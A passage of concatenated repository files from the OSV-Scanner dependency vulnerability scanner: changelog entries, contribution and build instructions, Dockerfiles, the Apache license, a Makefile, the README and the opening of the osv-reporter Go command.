Make `IgnoredVulns` also ignore aliases. - [Feature #304](https://github.com/google/osv-scanner/pull/304) OSV-Scanner now runs faster when there's multiple vulnerabilities. ### Fixes - [Bug #249](https://github.com/google/osv-scanner/issues/249) Support yarn locks with quoted properties. - [Bug #232](https://github.com/google/osv-scanner/issues/232) Parse nested CycloneDX components correctly. - [Bug #257](https://github.com/google/osv-scanner/issues/257) More specific cyclone dx parsing. - [Bug #256](https://github.com/google/osv-scanner/issues/256) Avoid panic when parsing `file:` dependencies in `pnpm` lockfiles. - [Bug #261](https://github.com/google/osv-scanner/issues/261) Deduplicate packages that appear multiple times in `Pipenv.lock` files. - [Bug #267](https://github.com/google/osv-scanner/issues/267) Properly handle comparing zero versions in Maven. - [Bug #279](https://github.com/google/osv-scanner/issues/279) Trim leading zeros off when comparing numerical components in Maven versions. - [Bug #291](https://github.com/google/osv-scanner/issues/291) Check if PURL is valid before adding it to queries. - [Bug #293](https://github.com/google/osv-scanner/issues/293) Avoid infinite loops parsing Maven poms with syntax errors - [Bug #295](https://github.com/google/osv-scanner/issues/295) Set version in the source code, this allows version to be displayed in most package managers. - [Bug #297](https://github.com/google/osv-scanner/issues/297) Support Pipenv develop packages without versions. ### API Features - [Feature #310](https://github.com/google/osv-scanner/pull/310) Improve the OSV models to allow for 3rd party use of the library. # v1.2.0: ### Major Features: - [Feature #168](https://github.com/google/osv-scanner/pull/168) Support for scanning debian package status file, usually located in `/var/lib/dpkg/status`. Thanks @cmaritan - [Feature #94](https://github.com/google/osv-scanner/pull/94) Specify what parser should be used in `--lockfile`. - [Feature #158](https://github.com/google/osv-scanner/pull/158) Specify output format to use with the `--format` flag. - [Feature #165](https://github.com/google/osv-scanner/pull/165) Respect `.gitignore` files by default when scanning. - [Feature #156](https://github.com/google/osv-scanner/pull/156) Support markdown table output format. Thanks @deftdawg - [Feature #59](https://github.com/google/osv-scanner/pull/59) Support `conan.lock` lockfiles and ecosystem Thanks @SSE4 - Updated documentation! Check it out here: https://google.github.io/osv-scanner/ ### Minor Updates: - [Feature #178](https://github.com/google/osv-scanner/pull/178) Support SPDX 2.3. - [Feature #221](https://github.com/google/osv-scanner/pull/221) Support dependencyManagement section in Maven poms. - [Feature #167](https://github.com/google/osv-scanner/pull/167) Make osvscanner API library public. - [Feature #141](https://github.com/google/osv-scanner/pull/141) Retry OSV API calls to mitigate transient network issues. Thanks @davift - [Feature #220](https://github.com/google/osv-scanner/pull/220) Vulnerability output is ordered deterministically. - [Feature #179](https://github.com/google/osv-scanner/pull/179) Log number of packages scanned from SBOM. - General dependency updates ### Fixes - [Bug #161](https://github.com/google/osv-scanner/pull/161) Exit with non zero exit code when there is a general error. - [Bug #185](https://github.com/google/osv-scanner/pull/185) Properly omit Source from JSON output. # v1.1.0: This update adds support for NuGet ecosystem and various bug fixes by the community. - [Feature #98](https://github.com/google/osv-scanner/pull/98): Support for NuGet ecosystem. - [Feature #71](https://github.com/google/osv-scanner/issues/71): Now supports Pipfile.lock scanning. - [Bug #85](https://github.com/google/osv-scanner/issues/85): Even better support for narrow terminals by shortening osv.dev URLs. - [Bug #105](https://github.com/google/osv-scanner/issues/105): Fix rare cases of too many open file handles. - [Bug #131](https://github.com/google/osv-scanner/pull/131): Fix table highlighting overflow. - [Bug #101](https://github.com/google/osv-scanner/issues/101): Now supports 32 bit systems. # v1.0.2 This is a minor patch release to mitigate human readable output issues on narrow terminals (#85). - [Bug #85](https://github.com/google/osv-scanner/issues/85): Better support for narrow terminals. # v1.0.1 Various bug fixes and improvements. Many thanks to the amazing contributions and suggestions from the community! - Feature: ARM64 builds are now also available! - [Feature #46](https://github.com/google/osv-scanner/pull/46): Gradle lockfile support. - [Feature #50](https://github.com/google/osv-scanner/pull/46): Add version command. - [Bug #52](https://github.com/google/osv-scanner/issues/52): Fixes 0 exit code being wrongly emitted when vulnerabilities are present. ================================================ FILE: CONTRIBUTING.md ================================================ # How to Contribute We'd love to accept your patches and contributions to this project. There are just a few small guidelines you need to follow. ## Contributor License Agreement Contributions to this project must be accompanied by a Contributor License Agreement. You (or your employer) retain the copyright to your contribution; this simply gives us permission to use and redistribute your contributions as part of the project. Head over to to see your current agreements on file or to sign a new one. You generally only need to submit a CLA once, so if you've already submitted one (even if it was for a different project), you probably don't need to do it again. ## Code reviews All submissions, including submissions by project members, require review. We use GitHub pull requests for this purpose. Consult [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more information on using pull requests. When creating a pull request, please use the provided [pull request template](/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md) and fill out the sections to ensure a smooth review process. For any new feature, please create an issue first to discuss the proposed changes before proceeding to make a pull request. This helps ensure that your contribution is aligned with the project's goals and avoids duplicate work. ## Community Guidelines This project follows [Google's Open Source Community Guidelines](https://opensource.google.com/conduct/). ## Contributing documentation Please review the documentation [README](docs/README.md) for more information about contributing to documentation. ## Contributing code ### Prerequisites Install: 1. [Go](https://go.dev/) 1.21+, use `go version` to check. 2. [GoReleaser](https://goreleaser.com/) (Optional, only if you want reproducible builds). > **Note** > > The scripts within `/scripts` expect to be run from the root of the repository ### Building #### Build using only `go` Run the following in the project directory: ```shell ./scripts/build.sh ``` Produces `osv-scanner` binary in the project directory. #### Build using `goreleaser` Run the following in the project directory: ```shell ./scripts/build_snapshot.sh ``` See GoReleaser [documentation](https://goreleaser.com/cmd/goreleaser_build/) for build options. You can also reproduce the downloadable builds by checking out the specific tag and running `goreleaser build`, using the same Go version as the one used during the actual release (see goreleaser workflows). ### Running tests To run tests: ```shell make test ``` To see a list of all tests and other available Makefile targets, you can run: ```shell make help ``` To get consistent test results, please run with `GOTOOLCHAIN=go`. The `Makefile` defines several modes you can use to change how tests run: - `SNAPS=true`: Update snapshot tests. - `ACC=true`: Run acceptance tests that require additional dependencies. - `SHORT=false`: Run the full test suite instead of the default short suite. - `VCR=`: Set the VCR recording mode (see below). By default, tests that require additional dependencies beyond the go toolchain are skipped. Enable these tests by running: ```shell make test ACC=true ``` You can generate an HTML coverage report by running: ```shell ./scripts/generate_coverage_report.sh ``` You can regenerate snapshots by running tests with `SNAPS=true`: ```shell make test SNAPS=true ``` Note that some long-running tests may be skipped and their snapshots will not be updated. To update all snapshots, use: ```shell make update-snapshots # Equivalent to: make test SNAPS=true SHORT=false ``` To update all snapshots for all tests, matching the CI test environment, use: ```shell make refresh-all ``` `cmd` tests use [`go-vcr`](https://github.com/dnaeon/go-vcr) to provide a custom `http.Client` for osv.dev requests to the `querybulk` endpoint which uses snapshots of requests called cassettes to reduce noise from changes to advisories while still providing a high degree of confidence. You can control the recording behaviour by passing `VCR=` as an argument to `make test`. The `` can be one of the [supported modes](https://github.com/dnaeon/go-vcr/blob/v4/pkg/recorder/recorder.go#L51), specified either by [its name without the `Mode` suffix or by its int value](./cmd/osv-scanner/internal/testcmd/vcr.go#L16). ```shell # Example: Disable VCR tests to passthrough network requests make test VCR=Passthrough ``` The default mode locally is `ReplayWithNewEpisodes`, meaning existing interactions will be replayed while any new ones will be recorded and added to the existing cassette; when running in CI, the default mode is `ReplayOnly` meaning an error will be raised if an http interaction is missing from a test's cassette. If adding a lockfile with known vulnerabilities for test data, also add an [`osv-scanner.toml`](https://google.github.io/osv-scanner/configuration/) config file to exclude those vulnerabilities from scans of the repository. ### Linting To lint your code, run ```shell ./scripts/run_lints.sh ``` ### Making commits Please follow the [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/) specification when squashing commits during a merge. This is typically the commit merged into the main branch and is often based on the PR title. Doing so helps us to automate processes like changelog generation and ensures a clear and consistent commit history. Some types: `feat:`, `fix:`, `docs:`, `chore:`, `refactor:`, and others. ## Contributing documentation Please follow these steps to successfully contribute documentation. 1. Fork the repository. 2. Make desired documentation changes. 3. Preview the changes by spinning up a GitHub page for your fork, building from your working branch. - On your fork, go to the settings tab and then the GitHub page settings. Sample URL: https://github.com/{your-github-profile}/osv-scanner/settings/pages - Under "Build and deployment" select "Deploy from a branch" - Set the branch to your working branch - Set the github page to build from the "/docs" folder - Hit save and wait for your site to build - Once it is ready, click the link and preview the docs ![Image shows the UI settings for building the GitHub page, which is described in step 3 of the contributing documentation instructions.](docs/images/github-page.png) 4. If you are satisfied with the changes, open a PR. 5. In the PR, link to your fork's GitHub page, so we can preview the changes. For information on how to run the documentation locally, please see our [documentation readme](https://github.com/google/osv-scanner/blob/main/docs/README.md/#running-docs-locally). ================================================ FILE: Dockerfile ================================================ # Copyright 2022 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039 AS builder WORKDIR /src COPY ./go.mod ./go.sum ./ RUN go mod download COPY ./ ./ RUN go build -o osv-scanner ./cmd/osv-scanner/ FROM alpine:3.23@sha256:25109184c71bdad752c8312a8623239686a9a2071e8825f20acb8f2198c3f659 RUN apk --no-cache add ca-certificates git && \ git config --global --add safe.directory '*' WORKDIR /root/ COPY --from=builder /src/osv-scanner . ENTRYPOINT ["/root/osv-scanner"] ================================================ FILE: LICENSE ================================================ Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ================================================ FILE: Makefile ================================================ export PATH := $(PATH):$(shell go env GOPATH)/bin # Default - run help .DEFAULT_GOAL := help # Defaults for test SHORT ?= true SNAPS ?= false ACC ?= false VCR ?= ReplayWithNewEpisodes help: ## Show this help message @awk 'BEGIN {FS = ":.*##"; printf "\nUsage:\n make \033[36m\033[0m\n"} \ /^[a-zA-Z_0-9-]+:.*?##/ { printf " \033[36m%-20s\033[0m %s\n", $$1, $$2 } \ /^## / { printf " %-20s %s\n", "", substr($$0, 4) }' $(MAKEFILE_LIST) ## Prevents make from trying to interpret the targets as files .PHONY: build scanner lint lint-fix format clean local-docs test update-snapshots refresh-all help build: ## Build scanner scripts/build.sh scanner: ## Run scanner (Usage: make scanner ARGS="") go run ./cmd/osv-scanner $(ARGS) lint: ## Run lints scripts/run_lints.sh lint-fix: ## Run lints and fix scripts/run_lints.sh --fix format: ## Run formatters scripts/run_formatters.sh clean: ## Clean build artifacts rm -f osv-scanner rm -f cmd/osv-scanner/scan/image/testdata/test-*.tar local-docs: ## Run local docs scripts/run_local_docs.sh test: ## Run tests ## Options: ## SNAPS=true Update snapshots (Default: false) ## ACC=true Run acceptance tests (Default: false) ## SHORT=false Run full tests (Default: true) ## VCR=mode VCR mode (Default: ReplayWithNewEpisodes): ## - 0|RecordOnly: Record new cassettes ## - 1|ReplayOnly: Replay cassettes, error if missing ## - 2|ReplayWithNewEpisodes: Replay, record if missing ## - 3|RecordOnce: Record if missing ## - 4|Passthrough: Disable VCR @export TEST_VCR_MODE=$(VCR); \ if [ "$(SNAPS)" = "true" ]; then export UPDATE_SNAPS=true; fi; \ if [ "$(ACC)" = "true" ]; then export TEST_ACCEPTANCE=true; fi; \ ARGS=""; \ if [ "$(SHORT)" = "true" ]; then ARGS="$$ARGS -short"; fi; \ scripts/run_tests.sh $$ARGS update-snapshots: ## Update all snapshots (Equivalent to make test SNAPS=true SHORT=false) $(MAKE) test SNAPS=true SHORT=false refresh-all: ## Refresh all snaps, matching CI test (Usage: make refresh-all REBUILD_IMAGES=true) @if [ "$(REBUILD_IMAGES)" = "true" ]; then $(MAKE) clean; fi $(MAKE) test ACC=true SHORT=false VCR=RecordOnly SNAPS=true ================================================ FILE: README.md ================================================ --- [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/google/osv-scanner/badge)](https://scorecard.dev/viewer/?uri=github.com/google/osv-scanner) [![Go Report Card](https://goreportcard.com/badge/github.com/google/osv-scanner)](https://goreportcard.com/report/github.com/google/osv-scanner) [![codecov](https://codecov.io/gh/google/osv-scanner/graph/badge.svg?token=C8IDVX9LP5)](https://codecov.io/gh/google/osv-scanner) [![SLSA 3](https://slsa.dev/images/gh-badge-level3.svg)](https://slsa.dev) [![GitHub Release](https://img.shields.io/github/v/release/google/osv-scanner)](https://github.com/google/osv-scanner/releases) Use OSV-Scanner to find existing vulnerabilities affecting your project's dependencies. OSV-Scanner provides an officially supported frontend to the [OSV database](https://osv.dev/) and CLI interface to [OSV-Scalibr](https://github.com/google/osv-scalibr) that connects a project’s list of dependencies with the vulnerabilities that affect them. OSV-Scanner supports a wide range of project types, package managers and features, including but not limited to: - **Languages:** C/C++, Dart, Elixir, Go, Java, Javascript, PHP, Python, R, Ruby, Rust. - **Package Managers:** npm, pip, yarn, maven, go modules, cargo, gem, composer, nuget and others. - **Operating Systems:** Detects vulnerabilities in OS packages on Linux systems. - **Containers:** Scans container images for vulnerabilities in their base images and included packages. - **Guided Remediation:** Provides recommendations for package version upgrades based on criteria such as dependency depth, minimum severity, fix strategy, and return on investment. OSV-Scanner uses the extensible [OSV-Scalibr](https://github.com/google/osv-scalibr) library under the hood to provide this functionality. If a language or package manager is not supported currently, please file a [feature request.](https://github.com/google/osv-scanner/issues) #### Underlying database The underlying database, [OSV.dev](https://osv.dev/) has several benefits in comparison with closed source advisory databases and scanners: - Covering most open source language and OS ecosystems (including [Git](https://osv.dev/list?q=&ecosystem=GIT)), it’s comprehensive. - Each advisory comes from an open and authoritative source (e.g. [GitHub Security Advisories](https://github.com/github/advisory-database), [RustSec Advisory Database](https://github.com/rustsec/advisory-db), [Ubuntu security notices](https://github.com/canonical/ubuntu-security-notices/tree/main/osv)) - Anyone can suggest improvements to advisories, resulting in a very high quality database. - The OSV format unambiguously stores information about affected versions in a machine-readable format that precisely maps onto a developer’s list of packages The above all results in accurate and actionable vulnerability notifications, which reduces the time needed to resolve them. Check out [OSV.dev](https://osv.dev/) for more details! ## Basic installation To install OSV-Scanner, please refer to the [installation section](https://google.github.io/osv-scanner/installation) of our documentation. OSV-Scanner releases can be found on the [releases page](https://github.com/google/osv-scanner/releases) of the GitHub repository. The recommended method is to download a prebuilt binary for your platform. Alternatively, you can use `go install github.com/google/osv-scanner/v2/cmd/osv-scanner@latest` to build it from source. ## Key Features For more information, please read our [detailed documentation](https://google.github.io/osv-scanner) to learn how to use OSV-Scanner. For detailed information about each feature, click their titles in this README. Please note: These are the instructions for the latest OSV-Scanner V2 beta. If you are using V1, checkout the V1 [README](https://github.com/google/osv-scanner-v1) and [documentation](https://google.github.io/osv-scanner-v1/) instead. ### [Scanning a source directory](https://google.github.io/osv-scanner/usage) ```bash $ osv-scanner scan source -r /path/to/your/dir ``` This command will recursively scan the specified directory for any supported package files, such as `package.json`, `go.mod`, `pom.xml`, etc. and output any discovered vulnerabilities. OSV-Scanner has the option of using call analysis to determine if a vulnerable function is actually being used in the project, resulting in fewer false positives, and actionable alerts. OSV-Scanner can also detect vendored C/C++ code for vulnerability scanning. See [here](https://google.github.io/osv-scanner/usage/#cc-scanning) for details. #### Supported Lockfiles OSV-Scanner supports 11+ language ecosystems and 19+ lockfile types. To check if your ecosystem is covered, please check out our [detailed documentation](https://google.github.io/osv-scanner/supported-languages-and-lockfiles/#supported-lockfiles). ### [Container Scanning](https://google.github.io/osv-scanner/usage/scan-image) OSV-Scanner also supports comprehensive, layer-aware scanning for container images to detect vulnerabilities the following operating system packages and language-specific dependencies. | Distro Support | Language Artifacts Support | | -------------- | -------------------------- | | Alpine OS | Go | | Debian | Java | | Ubuntu | Node | | | Python | See the [full documentation](https://google.github.io/osv-scanner/supported-languages-and-lockfiles/#supported-artifacts) for details on support. **Usage**: ```bash $ osv-scanner scan image my-image-name:tag ``` ![screencast of html output of container scanning](https://github.com/user-attachments/assets/8bb95366-27ec-45d1-86ed-e42890f2fb46) ### [License Scanning](https://google.github.io/osv-scanner/usage/license-scanning/) Check your dependencies' licenses using deps.dev data. For a summary: ```bash osv-scanner --licenses path/to/repository ``` To check against an allowed license list (SPDX format): ```bash osv-scanner --licenses="MIT,Apache-2.0" path/to/directory ``` ### [Offline Scanning](https://google.github.io/osv-scanner/usage/offline-mode/) Scan your project against a local OSV database. No network connection is required after the initial database download. The database can also be manually downloaded. ```bash osv-scanner --offline --download-offline-databases ./path/to/your/dir ``` ### [Guided Remediation](https://google.github.io/osv-scanner/experimental/guided-remediation/) (Experimental) OSV-Scanner provides guided remediation, a feature that suggests package version upgrades based on criteria such as dependency depth, minimum severity, fix strategy, and return on investment. We currently support remediating vulnerabilities in the following files: | Ecosystem | File Format (Type) | Supported Remediation Strategies | | :-------- | :----------------------------- | :---------------------------------------------------------------------------------------------------------------- | | npm | `package-lock.json` (lockfile) | [`in-place`](https://google.github.io/osv-scanner/experimental/guided-remediation/#in-place-lockfile-remediation) | | npm | `package.json` (manifest) | [`relock`](https://google.github.io/osv-scanner/experimental/guided-remediation/#in-place-lockfile-remediation) | | Maven | `pom.xml` (manifest) | [`override`](https://google.github.io/osv-scanner/experimental/guided-remediation/#override-dependency-versions) | This is available as a headless CLI command, as well as an interactive mode. #### Example (for npm) ```bash $ osv-scanner fix \ --max-depth=3 \ --min-severity=5 \ --ignore-dev \ --strategy=in-place \ -L path/to/package-lock.json ``` #### Interactive mode (for npm) ```bash $ osv-scanner fix \ -M path/to/package.json \ -L path/to/package-lock.json ``` Screenshot of the interactive relock results screen with some relaxation patches selected ## Data Sources and Privacy OSV-Scanner communicates with the following external services during operation: ### [OSV.dev API](https://osv.dev/) The primary data source for vulnerability information. OSV-Scanner queries this API to check packages for known vulnerabilities and to identify vendored C/C++ dependencies. Data sent includes package names, versions, ecosystems, and file hashes. Use [`--offline` mode](https://google.github.io/osv-scanner/usage/offline-mode/) to disable network requests and scan against a local database instead. ### [deps.dev API](https://docs.deps.dev/api/) Used for supplementary package information: - **Dependency resolution**: Resolves dependency graphs for vulnerability scanning and remediation - **Container image scanning**: Queries container image metadata for vulnerability detection - **License scanning** (`--licenses` flag): Retrieves license information for packages - **Package deprecation**: Checks if packages are deprecated Data sent includes package names, versions, and ecosystems. No source code is transmitted. ### Package Registries When using native registry for dependency resolution (instead of deps.dev), OSV-Scanner may query: | Registry | URL | Used For | | ------------- | ------------------------------ | ------------------------------------ | | Maven Central | `repo.maven.apache.org/maven2` | Maven package metadata and POM files | | npm Registry | `registry.npmjs.org` | npm package metadata | | PyPI | `pypi.org` | Python package metadata | ## Contribute ### Report Problems If you have what looks like a bug, please use the [GitHub issue tracking system](https://github.com/google/osv-scanner/issues). Before you file an issue, please search existing issues to see if your issue is already covered. ### Contributing code to `osv-scanner` See [CONTRIBUTING.md](CONTRIBUTING.md) for documentation on how to contribute code. ## Star History [![Star History Chart](https://api.star-history.com/svg?repos=google/osv-scanner&type=Date)](https://www.star-history.com/#google/osv-scanner&Date) ================================================ FILE: action.dockerfile ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039 RUN mkdir /src WORKDIR /src COPY ./go.mod /src/go.mod COPY ./go.sum /src/go.sum RUN go mod download COPY ./ /src/ RUN go build -o osv-scanner ./cmd/osv-scanner/ RUN go build -o osv-reporter ./cmd/osv-reporter/ FROM alpine:3.23@sha256:25109184c71bdad752c8312a8623239686a9a2071e8825f20acb8f2198c3f659 RUN apk --no-cache add \ ca-certificates \ git \ bash # Allow git to run on mounted directories RUN git config --global --add safe.directory '*' WORKDIR /root/ COPY --from=0 /src/osv-scanner ./ COPY --from=0 /src/osv-reporter ./ COPY ./exit_code_redirect.sh ./ ENV PATH="${PATH}:/root" ENTRYPOINT [ "bash", "-c", "echo 'WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action' && /root/exit_code_redirect.sh" ] ================================================ FILE: actions/reporter/action.yml ================================================ # Currently experimental. name: "osv-scanner-reporter" description: "Specialized reporting of scanner results for github actions" inputs: scan-args: description: "Arguments to osv-scanner, separated by new line" required: true runs: using: "docker" image: "../../action.dockerfile" entrypoint: /root/osv-reporter args: - "${{ inputs.scan-args }}" ================================================ FILE: actions/scanner/action.yml ================================================ # Currently experimental. # WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action name: "osv-scanner" description: "Scans your directory against the OSV database (Experimental)" inputs: scan-args: description: "Arguments to osv-scanner, separated by new line" default: |- --recursive ./ runs: using: "docker" image: "../../action.dockerfile" args: - ${{ inputs.scan-args }} ================================================ FILE: cmd/osv-reporter/main.go ================================================ // Package main implements the osv-reporter command, which generates GitHub Action // output for OSV scanner results. package main import ( "context" "errors" "fmt" "io" "log/slog" "os" "strings" "github.com/google/osv-scanner/v2/internal/ci" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/reporter" "github.com/google/osv-scanner/v2/internal/version" "github.com/google/osv-scanner/v2/pkg/models" "github.com/google/osv-scanner/v2/pkg/osvscanner" "github.com/urfave/cli/v3" "golang.org/x/term" ) var ( // Update this variable when doing a release commit = "n/a" date = "n/a" ) // splitLastArg splits the last argument by new lines and appends the split // elements onto args and returns it func splitLastArg(args []string) []string { lastArg := args[len(args)-1] lastArgSplits := strings.Split(lastArg, "\n") args = append(args[:len(args)-1], lastArgSplits...) return args } func run(args []string, stdout, stderr io.Writer) int { logger := cmdlogger.New(stdout, stderr) slog.SetDefault(slog.New(logger)) // Allow multiple arguments to be defined by github actions by splitting the last argument // by new lines. args = splitLastArg(args) cli.VersionPrinter = func(cmd *cli.Command) { cmdlogger.Infof("osv-scanner version: %s", cmd.Version) cmdlogger.Infof("commit: %s", commit) cmdlogger.Infof("built at: %s", date) } app := &cli.Command{ Name: "osv-scanner-action-reporter", Version: version.OSVVersion, Usage: "(Experimental) generates github action output", Description: "(Experimental) Used specifically to generate github action output ", Suggest: true, Writer: stdout, ErrWriter: stderr, Flags: []cli.Flag{ &cli.StringFlag{ Name: "old", Usage: "the old osv json output", TakesFile: true, Required: false, DefaultText: "", }, &cli.StringFlag{ Name: "new", Usage: "the new osv json output", TakesFile: true, Required: true, }, &cli.StringSliceFlag{ Name: "output-files", Usage: "used to save files to various formats (--output-files=[format]:[path],[format]:[path]...).\n" + "See available formats in osv-scanner (default output 'sarif').\n" + "In output paths, there are two special options to output to terminal - '#stdout' and '#stderr'.", TakesFile: true, }, &cli.StringSliceFlag{ Name: "output", Usage: "[DEPRECATED] (Use \"--output-files\" instead)", TakesFile: true, Action: func(_ context.Context, _ *cli.Command, _ []string) error { cmdlogger.Warnf("Warning: --output has been deprecated in favor of --output-files") return nil }, }, &cli.BoolFlag{ Name: "gh-annotations", Usage: "[DEPRECATED] (Use `--output-files=gh-annotations:#stderr`) prints github action annotations", }, &cli.BoolFlag{ Name: "fail-on-vuln", Usage: "whether to return 1 when vulnerabilities are found", DefaultText: "true", }, &cli.BoolFlag{ Name: "all-vulns", Usage: "show all vulnerabilities including unimportant and uncalled ones", }, }, Action: 